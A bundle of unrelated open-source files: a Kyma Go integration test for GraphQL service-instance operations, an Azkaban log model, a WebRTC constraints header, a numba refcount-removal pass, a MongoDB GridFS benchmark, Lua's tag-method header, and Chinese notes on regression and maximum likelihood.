"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/auth"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/fixture"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/domain/shared/wait"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/graphql"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
type ServiceInstanceEvent struct {
Type string
ServiceInstance shared.ServiceInstance
}
type instancesQueryResponse struct {
ServiceInstances []shared.ServiceInstance
}
type instanceQueryResponse struct {
ServiceInstance shared.ServiceInstance
}
type instanceCreateMutationResponse struct {
CreateServiceInstance shared.ServiceInstance
}
type instanceDeleteMutationResponse struct {
DeleteServiceInstance shared.ServiceInstance
}
func TestServiceInstanceMutationsAndQueries(t *testing.T) {
c, err := graphql.New()
require.NoError(t, err)
k8sClient, _, err := client.NewClientWithConfig()
require.NoError(t, err)
svcatCli, _, err := client.NewServiceCatalogClientWithConfig()
require.NoError(t, err)
expectedResourceFromClusterServiceClass := fixture.ServiceInstanceFromClusterServiceClass("cluster-test-instance", TestNamespace)
expectedResourceFromServiceClass := fixture.ServiceInstanceFromServiceClass("test-instance", TestNamespace)
resourceDetailsQuery := instanceDetailsFields()
t.Log(fmt.Sprintf("Subscribe instance created by %s", ClusterServiceBrokerKind))
subscription := subscribeInstance(c, instanceEventDetailsFields(), expectedResourceFromClusterServiceClass.Namespace)
defer subscription.Close()
t.Log(fmt.Sprintf("Create instance from %s", ClusterServiceBrokerKind))
createRes, err := createInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass, true)
require.NoError(t, err)
checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, createRes.CreateServiceInstance)
t.Log(fmt.Sprintf("Check subscription event of instance created by %s", ClusterServiceBrokerKind))
expectedEvent := instanceEvent("ADD", expectedResourceFromClusterServiceClass)
event, err := readInstanceEvent(subscription)
assert.NoError(t, err)
checkInstanceEvent(t, expectedEvent, event)
t.Log(("Wait for instance Ready created by %s"), ClusterServiceBrokerKind)
err = wait.ForServiceInstanceReady(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log(fmt.Sprintf("Create instance from %s", ServiceBrokerKind))
createRes, err = createInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass, false)
require.NoError(t, err)
checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, createRes.CreateServiceInstance)
t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ServiceBrokerKind))
err = wait.ForServiceInstanceReady(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log(fmt.Sprintf("Query Single Resource - instance created by %s", ClusterServiceBrokerKind))
res, err := querySingleInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass)
assert.NoError(t, err)
checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, res.ServiceInstance)
t.Log(fmt.Sprintf("Query Single Resource - instance created by %s", ServiceBrokerKind))
res, err = querySingleInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass)
assert.NoError(t, err)
checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, res.ServiceInstance)
t.Log("Query Multiple Resources")
multipleRes, err := queryMultipleInstances(c, resourceDetailsQuery, TestNamespace)
assert.NoError(t, err)
assertInstanceFromClusterServiceClassExistsAndEqual(t, expectedResourceFromClusterServiceClass, multipleRes.ServiceInstances)
assertInstanceFromServiceClassExistsAndEqual(t, expectedResourceFromServiceClass, multipleRes.ServiceInstances)
// We must again wait for RUNNING status of created instances, because sometimes Kubernetess change status from RUNNING to PROVISIONING at the first queries - Query Single Resource
t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ClusterServiceBrokerKind))
err = wait.ForServiceInstanceReady(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log(fmt.Sprintf("Wait for instance Ready created by %s", ServiceBrokerKind))
err = wait.ForServiceInstanceReady(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log("Query Multiple Resources With Status")
multipleResWithStatus, err := queryMultipleInstancesWithStatus(c, resourceDetailsQuery, TestNamespace)
assert.NoError(t, err)
assertInstanceFromClusterServiceClassExistsAndEqual(t, expectedResourceFromClusterServiceClass, multipleResWithStatus.ServiceInstances)
assertInstanceFromServiceClassExistsAndEqual(t, expectedResourceFromServiceClass, multipleRes.ServiceInstances)
t.Log(fmt.Sprintf("Delete instance created by %s", ClusterServiceBrokerKind))
deleteRes, err := deleteInstance(c, resourceDetailsQuery, expectedResourceFromClusterServiceClass)
assert.NoError(t, err)
checkInstanceFromClusterServiceClass(t, expectedResourceFromClusterServiceClass, deleteRes.DeleteServiceInstance)
t.Log(fmt.Sprintf("Wait for deletion of instance created by %s", ClusterServiceBrokerKind))
err = wait.ForServiceInstanceDeletion(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log(fmt.Sprintf("Delete instance created by %s", ServiceBrokerKind))
deleteRes, err = deleteInstance(c, resourceDetailsQuery, expectedResourceFromServiceClass)
assert.NoError(t, err)
checkInstanceFromServiceClass(t, expectedResourceFromServiceClass, deleteRes.DeleteServiceInstance)
t.Log(fmt.Sprintf("Wait for deletion of instance created by %s", ServiceBrokerKind))
err = wait.ForServiceInstanceDeletion(expectedResourceFromServiceClass.Name, expectedResourceFromServiceClass.Namespace, svcatCli)
if err != nil {
shared.LogReport(expectedResourceFromClusterServiceClass.Name, expectedResourceFromClusterServiceClass.Namespace, svcatCli, k8sClient)
}
assert.NoError(t, err)
t.Log("Checking authorization directives...")
ops := &auth.OperationsInput{
auth.Get: {fixServiceInstanceRequest(resourceDetailsQuery, expectedResourceFromServiceClass)},
auth.List: {
fixServiceInstancesRequest(resourceDetailsQuery, expectedResourceFromServiceClass.Namespace),
fixServiceInstancesWithStatusRequest(resourceDetailsQuery, expectedResourceFromServiceClass.Namespace),
},
auth.Create: {
fixCreateServiceInstanceRequest(resourceDetailsQuery, fixture.ServiceInstanceFromClusterServiceClass("", TestNamespace), true),
fixCreateServiceInstanceRequest(resourceDetailsQuery, fixture.ServiceInstanceFromServiceClass("", TestNamespace), false),
},
auth.Delete: {fixDeleteServiceInstanceRequest(resourceDetailsQuery, expectedResourceFromServiceClass)},
auth.Watch: {fixInstanceSubscription(instanceEventDetailsFields(), TestNamespace)},
}
AuthSuite.Run(t, ops)
}
func fixCreateServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance, clusterWide bool) *graphql.Request {
query := fmt.Sprintf(`
mutation ($name: String!, $namespace: String!, $externalPlanName: String!, $externalServiceClassName: String!, $labels: [String!]!, $parameterSchema: JSON) {
createServiceInstance(namespace: $namespace, params: {
name: $name,
classRef: {
externalName: $externalServiceClassName,
clusterWide: %v,
},
planRef: {
externalName: $externalPlanName,
clusterWide: %v,
},
labels: $labels,
parameterSchema: $parameterSchema
}) {
%s
}
}
`, clusterWide, clusterWide, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("name", expectedResource.Name)
req.SetVar("namespace", expectedResource.Namespace)
if clusterWide {
req.SetVar("externalPlanName", expectedResource.ClusterServicePlan.ExternalName)
req.SetVar("externalServiceClassName", expectedResource.ClusterServiceClass.ExternalName)
} else {
req.SetVar("externalPlanName", expectedResource.ServicePlan.ExternalName)
req.SetVar("externalServiceClassName", expectedResource.ServiceClass.ExternalName)
}
req.SetVar("labels", expectedResource.Labels)
req.SetVar("parameterSchema", expectedResource.PlanSpec)
return req
}
func createInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance, clusterWide bool) (instanceCreateMutationResponse, error) {
req := fixCreateServiceInstanceRequest(resourceDetailsQuery, expectedResource, clusterWide)
var res instanceCreateMutationResponse
err := c.Do(req, &res)
return res, err
}
func fixInstanceSubscription(resourceDetailsQuery string, namespace string) *graphql.Request {
query := fmt.Sprintf(`
subscription ($namespace: String!) {
serviceInstanceEvent(namespace: $namespace) {
%s
}
}
`, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("namespace", namespace)
return req
}
func subscribeInstance(c *graphql.Client, resourceDetailsQuery string, namespace string) *graphql.Subscription {
req := fixInstanceSubscription(resourceDetailsQuery, namespace)
return c.Subscribe(req)
}
func querySingleInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance) (instanceQueryResponse, error) {
req := fixServiceInstanceRequest(resourceDetailsQuery, expectedResource)
var res instanceQueryResponse
err := c.Do(req, &res)
return res, err
}
func fixServiceInstancesRequest(resourceDetailsQuery, namespace string) *graphql.Request {
query := fmt.Sprintf(`
query ($namespace: String!) {
serviceInstances(namespace: $namespace) {
%s
}
}
`, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("namespace", namespace)
return req
}
func queryMultipleInstances(c *graphql.Client, resourceDetailsQuery, namespace string) (instancesQueryResponse, error) {
req := fixServiceInstancesRequest(resourceDetailsQuery, namespace)
var res instancesQueryResponse
err := c.Do(req, &res)
return res, err
}
func fixServiceInstancesWithStatusRequest(resourceDetailsQuery, namespace string) *graphql.Request {
query := fmt.Sprintf(`
query ($namespace: String!, $status: InstanceStatusType) {
serviceInstances(namespace: $namespace, status: $status) {
%s
}
}
`, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("namespace", namespace)
req.SetVar("status", shared.ServiceInstanceStatusTypeRunning)
return req
}
func queryMultipleInstancesWithStatus(c *graphql.Client, resourceDetailsQuery, namespace string) (instancesQueryResponse, error) {
req := fixServiceInstancesWithStatusRequest(resourceDetailsQuery, namespace)
var res instancesQueryResponse
err := c.Do(req, &res)
return res, err
}
func fixDeleteServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance) *graphql.Request {
query := fmt.Sprintf(`
mutation ($name: String!, $namespace: String!) {
deleteServiceInstance(name: $name, namespace: $namespace) {
%s
}
}
`, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("name", expectedResource.Name)
req.SetVar("namespace", expectedResource.Namespace)
return req
}
func deleteInstance(c *graphql.Client, resourceDetailsQuery string, expectedResource shared.ServiceInstance) (instanceDeleteMutationResponse, error) {
req := fixDeleteServiceInstanceRequest(resourceDetailsQuery, expectedResource)
var res instanceDeleteMutationResponse
err := c.Do(req, &res)
return res, err
}
func fixServiceInstanceRequest(resourceDetailsQuery string, expectedResource shared.ServiceInstance) *graphql.Request {
query := fmt.Sprintf(`
query ($name: String!, $namespace: String!) {
serviceInstance(name: $name, namespace: $namespace) {
%s
}
}
`, resourceDetailsQuery)
req := graphql.NewRequest(query)
req.SetVar("name", expectedResource.Name)
req.SetVar("namespace", expectedResource.Namespace)
return req
}
func instanceDetailsFields() string {
return `
name
namespace
planSpec
bindable
creationTimestamp
labels
classReference {
name
displayName
clusterWide
}
planReference {
name
displayName
clusterWide
}
status {
type
reason
message
}
clusterServicePlan {
name
displayName
externalName
description
relatedClusterServiceClassName
instanceCreateParameterSchema
}
clusterServiceClass {
name
externalName
displayName
creationTimestamp
description
longDescription
imageUrl
documentationUrl
supportUrl
providerDisplayName
tags
activated
}
servicePlan {
name
displayName
externalName
description
relatedServiceClassName
instanceCreateParameterSchema
bindingCreateParameterSchema
}
serviceClass {
name
namespace
externalName
displayName
creationTimestamp
description
longDescription
imageUrl
documentationUrl
supportUrl
providerDisplayName
tags
activated
}
serviceBindings {
items {
name
serviceInstanceName
namespace
secret {
name
namespace
data
}
}
stats {
ready
failed
pending
unknown
}
}
serviceBindingUsages {
name
namespace
usedBy {
kind
name
}
}
`
}
func instanceEventDetailsFields() string {
return fmt.Sprintf(`
type
serviceInstance {
%s
}
`, instanceDetailsFields())
}
func checkInstanceFromClusterServiceClass(t *testing.T, expected, actual shared.ServiceInstance) {
// Name
assert.Equal(t, expected.Name, actual.Name)
// Namespace
assert.Equal(t, expected.Namespace, actual.Namespace)
// ClusterServicePlan.Name
assert.Equal(t, expected.ClusterServicePlan.Name, actual.ClusterServicePlan.Name)
// ClusterServiceClass.Name
assert.Equal(t, expected.ClusterServiceClass.Name, actual.ClusterServiceClass.Name)
assert.Equal(t, expected.Labels, actual.Labels)
assert.Equal(t, expected.Bindable, actual.Bindable)
}
func checkInstanceFromServiceClass(t *testing.T, expected, actual shared.ServiceInstance) {
// Name
assert.Equal(t, expected.Name, actual.Name)
// Namespace
assert.Equal(t, expected.Namespace, actual.Namespace)
// ServicePlan.Name
assert.Equal(t, expected.ServicePlan.Name, actual.ServicePlan.Name)
// ServiceClass.Name
assert.Equal(t, expected.ServiceClass.Name, actual.ServiceClass.Name)
// ServiceClass.Namespace
assert.Equal(t, expected.ServiceClass.Namespace, actual.ServiceClass.Namespace)
}
func assertInstanceFromClusterServiceClassExistsAndEqual(t *testing.T, expectedElement shared.ServiceInstance, arr []shared.ServiceInstance) {
assert.Condition(t, func() (success bool) {
for _, v := range arr {
if v.Name == expectedElement.Name {
checkInstanceFromClusterServiceClass(t, expectedElement, v)
return true
}
}
return false
}, "Resource does not exist")
}
func assertInstanceFromServiceClassExistsAndEqual(t *testing.T, expectedElement shared.ServiceInstance, arr []shared.ServiceInstance) {
assert.Condition(t, func() (success bool) {
for _, v := range arr {
if v.Name == expectedElement.Name {
checkInstanceFromServiceClass(t, expectedElement, v)
return true
}
}
return false
}, "Resource does not exist")
}
func instanceEvent(eventType string, serviceInstance shared.ServiceInstance) ServiceInstanceEvent {
return ServiceInstanceEvent{
Type: eventType,
ServiceInstance: serviceInstance,
}
}
func readInstanceEvent(sub *graphql.Subscription) (ServiceInstanceEvent, error) {
type Response struct {
ServiceInstanceEvent ServiceInstanceEvent
}
var bindingEvent Response
err := sub.Next(&bindingEvent, tester.DefaultSubscriptionTimeout)
return bindingEvent.ServiceInstanceEvent, err
}
func checkInstanceEvent(t *testing.T, expected, actual ServiceInstanceEvent) {
assert.Equal(t, expected.Type, actual.Type)
assert.Equal(t, expected.ServiceInstance.Name, actual.ServiceInstance.Name)
}
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2014 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
$.namespace('azkaban');
azkaban.JobLogModel = Backbone.Model.extend({
initialize: function () {
this.set("offset", 0);
this.set("logData", "");
},
refresh: function () {
var requestURL = contextURL + "/executor";
var requestData = {
"execid": execId,
"jobId": jobId,
"ajax": "fetchExecJobLogs",
"offset": this.get("offset"),
"length": 50000,
"attempt": attempt
};
var self = this;
var successHandler = function (data) {
console.log("fetchLogs " + data.offset);
if (data.error) {
console.log(data.error);
}
else {
self.set("offset", data.offset + data.length);
self.set("logData", self.get("logData") + data.data);
if (data.length != 0) {
// There may be more data available so request the next chunk
self.refresh();
}
}
};
$.ajax({
url: requestURL,
type: "get",
data: requestData,
dataType: "json",
error: function (data) {
console.log(data);
},
success: successHandler
});
},
});
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2013 The WebRTC project authors. All Rights Reserved.
*
* Use of this source code is governed by a BSD-style license
* that can be found in the LICENSE file in the root of the source
* tree. An additional intellectual property rights grant can be found
* in the file PATENTS. All contributing project authors may
* be found in the AUTHORS file in the root of the source tree.
*/
// This file contains the interface for MediaConstraints, corresponding to
// the definition at
// http://www.w3.org/TR/mediacapture-streams/#mediastreamconstraints and also
// used in WebRTC: http://dev.w3.org/2011/webrtc/editor/webrtc.html#constraints.
// This interface is being deprecated in Chrome, and may be removed
// from WebRTC too.
// https://bugs.chromium.org/p/webrtc/issues/detail?id=5617
#ifndef WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
#define WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
#include <string>
#include <vector>
#include "webrtc/base/optional.h"
#include "webrtc/api/peerconnectioninterface.h"
namespace webrtc {
// MediaConstraintsInterface
// Interface used for passing arguments about media constraints
// to the MediaStream and PeerConnection implementation.
class MediaConstraintsInterface {
public:
struct Constraint {
Constraint() {}
Constraint(const std::string& key, const std::string value)
: key(key), value(value) {
}
std::string key;
std::string value;
};
class Constraints : public std::vector<Constraint> {
public:
bool FindFirst(const std::string& key, std::string* value) const;
};
virtual const Constraints& GetMandatory() const = 0;
virtual const Constraints& GetOptional() const = 0;
// Constraint keys used by a local video source.
// Specified by draft-alvestrand-constraints-resolution-00b
static const char kMinAspectRatio[]; // minAspectRatio
static const char kMaxAspectRatio[]; // maxAspectRatio
static const char kMaxWidth[]; // maxWidth
static const char kMinWidth[]; // minWidth
static const char kMaxHeight[]; // maxHeight
static const char kMinHeight[]; // minHeight
static const char kMaxFrameRate[]; // maxFrameRate
static const char kMinFrameRate[]; // minFrameRate
// Constraint keys used by a local audio source.
static const char kEchoCancellation[]; // echoCancellation
// These keys are google specific.
static const char kGoogEchoCancellation[]; // googEchoCancellation
static const char kExtendedFilterEchoCancellation[]; // googEchoCancellation2
static const char kDAEchoCancellation[]; // googDAEchoCancellation
static const char kAutoGainControl[]; // googAutoGainControl
static const char kExperimentalAutoGainControl[]; // googAutoGainControl2
static const char kNoiseSuppression[]; // googNoiseSuppression
static const char kExperimentalNoiseSuppression[]; // googNoiseSuppression2
static const char kIntelligibilityEnhancer[]; // intelligibilityEnhancer
static const char kHighpassFilter[]; // googHighpassFilter
static const char kTypingNoiseDetection[]; // googTypingNoiseDetection
static const char kAudioMirroring[]; // googAudioMirroring
// Google-specific constraint keys for a local video source
static const char kNoiseReduction[]; // googNoiseReduction
// Constraint keys for CreateOffer / CreateAnswer
// Specified by the W3C PeerConnection spec
static const char kOfferToReceiveVideo[]; // OfferToReceiveVideo
static const char kOfferToReceiveAudio[]; // OfferToReceiveAudio
static const char kVoiceActivityDetection[]; // VoiceActivityDetection
static const char kIceRestart[]; // IceRestart
// These keys are google specific.
static const char kUseRtpMux[]; // googUseRtpMUX
// Constraints values.
static const char kValueTrue[]; // true
static const char kValueFalse[]; // false
// PeerConnection constraint keys.
// Temporary pseudo-constraints used to enable DTLS-SRTP
static const char kEnableDtlsSrtp[]; // Enable DTLS-SRTP
// Temporary pseudo-constraints used to enable DataChannels
static const char kEnableRtpDataChannels[]; // Enable RTP DataChannels
// Google-specific constraint keys.
// Temporary pseudo-constraint for enabling DSCP through JS.
static const char kEnableDscp[]; // googDscp
// Constraint to enable IPv6 through JS.
static const char kEnableIPv6[]; // googIPv6
// Temporary constraint to enable suspend below min bitrate feature.
static const char kEnableVideoSuspendBelowMinBitrate[];
// googSuspendBelowMinBitrate
// Constraint to enable combined audio+video bandwidth estimation.
static const char kCombinedAudioVideoBwe[]; // googCombinedAudioVideoBwe
static const char kScreencastMinBitrate[]; // googScreencastMinBitrate
static const char kCpuOveruseDetection[]; // googCpuOveruseDetection
static const char kPayloadPadding[]; // googPayloadPadding
// The prefix of internal-only constraints whose JS set values should be
// stripped by Chrome before passed down to Libjingle.
static const char kInternalConstraintPrefix[];
protected:
// Dtor protected as objects shouldn't be deleted via this interface
virtual ~MediaConstraintsInterface() {}
};
bool FindConstraint(const MediaConstraintsInterface* constraints,
const std::string& key, bool* value,
size_t* mandatory_constraints);
bool FindConstraint(const MediaConstraintsInterface* constraints,
const std::string& key,
int* value,
size_t* mandatory_constraints);
// Copy all relevant constraints into an RTCConfiguration object.
void CopyConstraintsIntoRtcConfiguration(
const MediaConstraintsInterface* constraints,
PeerConnectionInterface::RTCConfiguration* configuration);
} // namespace webrtc
#endif // WEBRTC_API_MEDIACONSTRAINTSINTERFACE_H_
| {
"pile_set_name": "Github"
} |
"""
Implement a rewrite pass on LLVM module to remove unnecessary refcount
operation.
"""
from __future__ import absolute_import, print_function
from llvmlite.ir.transforms import CallVisitor
from numba import types
class _MarkNrtCallVisitor(CallVisitor):
"""
A pass to mark all NRT_incref and NRT_decref.
"""
def __init__(self):
self.marked = set()
def visit_Call(self, instr):
if getattr(instr.callee, 'name', '') in ('NRT_incref', 'NRT_decref'):
self.marked.add(instr)
def _rewrite_function(function):
# Mark NRT usage
markpass = _MarkNrtCallVisitor()
markpass.visit_Function(function)
marked = markpass.marked
# Remove NRT usage
for bb in function.basic_blocks:
for inst in list(bb.instructions):
if inst in marked:
bb.instructions.remove(inst)
_accepted_nrtfns = 'NRT_incref', 'NRT_decref'
def _legalize(module, dmm, fndesc):
"""
Legalize the code in the module.
Returns True if the module is legal for the rewrite pass that remove
unnecessary refcount.
"""
def valid_output(ty):
"""
Valid output are any type that does not need refcount
"""
model = dmm[ty]
return not model.contains_nrt_meminfo()
def valid_input(ty):
"""
Valid input are any type that does not need refcount except Array.
"""
return valid_output(ty) or isinstance(ty, types.Array)
argtypes = fndesc.argtypes
restype = fndesc.restype
calltypes = fndesc.calltypes
# Legalize function arguments
for argty in argtypes:
if not valid_input(argty):
return False
# Legalize function return
if not valid_output(restype):
return False
# Legalize all called functions
for callty in calltypes.values():
if callty is not None and not valid_output(callty.return_type):
return False
# Ensure no allocation
for fn in module.functions:
if fn.name.startswith("NRT_"):
if fn.name not in _accepted_nrtfns:
return False
return True
def remove_unnecessary_nrt_usage(function, context, fndesc):
"""
Remove unnecessary NRT incref/decref in the given LLVM function.
It uses highlevel type info to determine if the function does not need NRT.
Such a function does not:
- return array object;
- take arguments that need refcount except array;
- call function that return refcounted object.
In effect, the function will not capture or create references that extend
the lifetime of any refcounted objects beyound the lifetime of the
function.
The rewrite performs inplace.
If rewrite has happen, this function return True. Otherwise, return False.
"""
dmm = context.data_model_manager
if _legalize(function.module, dmm, fndesc):
_rewrite_function(function)
return True
else:
return False
| {
"pile_set_name": "Github"
} |
var Db = require('../../lib/mongodb').Db,
Server = require('../../lib/mongodb').Server,
ObjectID = require('../../lib/mongodb').ObjectID,
GridStore = require('../../lib/mongodb').GridStore;
var simulated_buffer = new Buffer(1024*1000*10).toString();
new Db('grid_fs_write_benchmark', new Server("127.0.0.1", 27017, {auto_reconnect: true}), {}).open(function(err, new_client) {
new_client.dropDatabase(function(err, result) {
new_client.close();
for(var i = 0; i < 1; i++) {
new Db('grid_fs_write_benchmark', new Server("127.0.0.1", 27017, {auto_reconnect: true}), {}).open(function(err, client) {
var gridStore = new GridStore(client, "foobar" + i, "w");
gridStore.open(function(err, gridStore) {
gridStore.write(simulated_buffer.toString(), function(err, gridStore) {
gridStore.close(function(err, result) {
client.close();
});
});
});
});
}
})
});
| {
"pile_set_name": "Github"
} |
/*
** $Id: ltm.h,v 2.22.1.1 2017/04/19 17:20:42 roberto Exp $
** Tag methods
** See Copyright Notice in lua.h
*/
#ifndef ltm_h
#define ltm_h
#include "lobject.h"
/*
* WARNING: if you change the order of this enumeration,
* grep "ORDER TM" and "ORDER OP"
*/
typedef enum {
TM_INDEX,
TM_NEWINDEX,
TM_GC,
TM_MODE,
TM_LEN,
TM_EQ, /* last tag method with fast access */
TM_ADD,
TM_SUB,
TM_MUL,
TM_MOD,
TM_POW,
TM_DIV,
TM_IDIV,
TM_BAND,
TM_BOR,
TM_BXOR,
TM_SHL,
TM_SHR,
TM_UNM,
TM_BNOT,
TM_LT,
TM_LE,
TM_CONCAT,
TM_CALL,
TM_N /* number of elements in the enum */
} TMS;
#define gfasttm(g,et,e) ((et) == NULL ? NULL : \
((et)->flags & (1u<<(e))) ? NULL : luaT_gettm(et, e, (g)->tmname[e]))
#define fasttm(l,et,e) gfasttm(G(l), et, e)
#define ttypename(x) luaT_typenames_[(x) + 1]
LUAI_DDEC const char *const luaT_typenames_[LUA_TOTALTAGS];
LUAI_FUNC const char *luaT_objtypename (lua_State *L, const TValue *o);
LUAI_FUNC const TValue *luaT_gettm (Table *events, TMS event, TString *ename);
LUAI_FUNC const TValue *luaT_gettmbyobj (lua_State *L, const TValue *o,
TMS event);
LUAI_FUNC void luaT_init (lua_State *L);
LUAI_FUNC void luaT_callTM (lua_State *L, const TValue *f, const TValue *p1,
const TValue *p2, TValue *p3, int hasres);
LUAI_FUNC int luaT_callbinTM (lua_State *L, const TValue *p1, const TValue *p2,
StkId res, TMS event);
LUAI_FUNC void luaT_trybinTM (lua_State *L, const TValue *p1, const TValue *p2,
StkId res, TMS event);
LUAI_FUNC int luaT_callorderTM (lua_State *L, const TValue *p1,
const TValue *p2, TMS event);
#endif
| {
"pile_set_name": "Github"
} |
## 李宏毅机器学习Day1-3:线性回归任务一
### 什么是机器学习?
机器学习的核心是“**使用算法解析数据,从中学习,然后对世界上的某件事情做出决定或预测**”。
Tom Mitchell提供了一个更现代的定义:“据说计算机程序从经验E中学习某些任务T和绩效测量P,如果它在T中的任务中的表现,由P测量,随经验E而改善。 “
示例:玩跳棋。
E =玩许多跳棋游戏的经验
T =玩跳棋的任务。
P =程序赢得下一场比赛的概率。
### 中心极限定理
中心极限定理指的是给定一个任意分布的总体。我每次从这些总体中随机抽取 n 个抽样,一共抽 m 次。 然后把这 m 组抽样分别求出平均值。 这些平均值的分布接近**正态分布**。
### 正态分布
#### 概率密度函数
在数学中,连续型随机变量的**概率密度函数**(Probability density function)是一个描述这个随机变量的输出值,在某个确定的取值点附近的可能性的函数。**累积分布函数**是概率密度函数的积分。
也叫高斯分布。其概率密度公式为:
$f(x)=\frac{1}{\sigma \sqrt{2 \pi}} e^{-\frac{(x-\mu)^{2}}{2 \sigma^{2}}}$
其中$u$为均值,$\sigma^{2}$为方差。
如果一个随机变量$X$服从这个分布,我们写作$X$~$N(\mu, \sigma^2)$, 如果$u=0$,且$\sigma=1$,则这个分布被称为**标准正态分布**。
下面是四个不同参数的概率密度函数:

### 最大似然估计
最大似然估计是一种确定模型参数值的方法,基于**最大似然原理**提出。确定参数值的过程,是找到能最大化模型产生真实观察数据可能性的那一组参数。
#### 最大似然原理
> 概率大的事件在一次观测中更容易发生。
> 在一次观测中发生了的事件其概率应该大。
举例:
>1. 某同学与一位猎人一起外出打猎。忽然,一只野兔从前方窜过,只听一声枪响,野兔应声倒下,请问:是谁击中了野兔?
>2. 事件A,发生的概率p只可能为0.1,0.3或0.6,在一次观测中,A发生了,请问:p为何值?
#### 计算最大似然估计
给定一个概率分布$ {\displaystyle D} $,已知其概率密度函数(连续分布)或概率质量函数(离散分布)为$ {\displaystyle f_{D}}$,以及一个分布参数 ${\displaystyle \theta }$,我们可以从这个分布中抽出一个具有$ n $个值的采样 ${\displaystyle X_{1},X_{2},\ldots ,X_{n}}$,利用 ${\displaystyle f_{D}}$计算出其似然函数:
${\displaystyle {\mbox{L}}(\theta \mid x_{1},\dots ,x_{n})=f_{\theta }(x_{1},\dots ,x_{n})} $
若$ {\displaystyle D} $是离散分布, ${\displaystyle f_{\theta }}$即是在参数为$ {\displaystyle \theta }$时观测到这一采样的概率。若其是连续分布, ${\displaystyle f_{\theta }}$ 则为 ${\displaystyle X_{1},X_{2},\ldots ,X_{n}}$联合分布的概率密度函数在观测值处的取值。从数学上来说,我们可以在${\displaystyle f_{\theta }}$ 的所有可能取值中寻找一个参数值使得似然函数取到最大值,这个参数值被称为最大似然估计(maximum likelihood estimates,MLE)。
步骤如下:
- **取对数**
- **求导数,得驻点,最大值点**
- **作结论**
#### 小结
##### **最大似然估计总是能精确地得到解吗?**
简单来说,不能。更有可能的是,在真实的场景中,对数似然函数的导数仍然是难以解析的(也就是说,很难甚至不可能人工对函数求微分)。因此,一般采用期望最大化(EM)算法等迭代方法为参数估计找到数值解,但总体思路还是一样的。
**什么时候最小二乘参数估计和最大似然估计结果相同?**
最小二乘法是另一种常用的机器学习模型参数估计方法。结果表明,当模型向上述例子中一样被假设为高斯分布时,MLE 的估计等价于最小二乘法。
对于最小二乘参数估计,我们想要找到最小化数据点和回归线之间距离平方之和的直线。在最大似然估计中,我们想要最大化数据同时出现的总概率。当待求分布被假设为高斯分布时,最大概率会在数据点接近平均值时找到。由于高斯分布是对称的,这等价于最小化数据点与平均值之间的距离。
### 推导回归Loss Function
**损失函数**(loss function)是用来估量你模型的预测值$f(x)$与真实值$Y$的不一致程度,损失函数越小,模型的鲁棒性就越好。这里我们使用均方误差(MSE)作为我们的损失函数。
定义:
$$
\begin{aligned}
L(w,b) & = \sum_{j=1}^{m}\left ( y^{(j)}- f(x^{(j)}) \right )^2,
其中 f(x)=b+\sum_{i=1}^{n} w_{i} x_{i},代入得到 \\
& = \sum_{j=1}^{m}\left(y^{(j)}-\left(b+\sum_{i=1}^{n} w_{i} x_{i}^{(j)}\right)\right)^{2}\\
\end{aligned}
$$
其中 $(x^{(j)},y^{(j)})$为 样本点,$m$为样本点计数,$x_i$为训练集特征值,$w_i$为权重,$b$为偏置值,$f(x)$为模型函数。
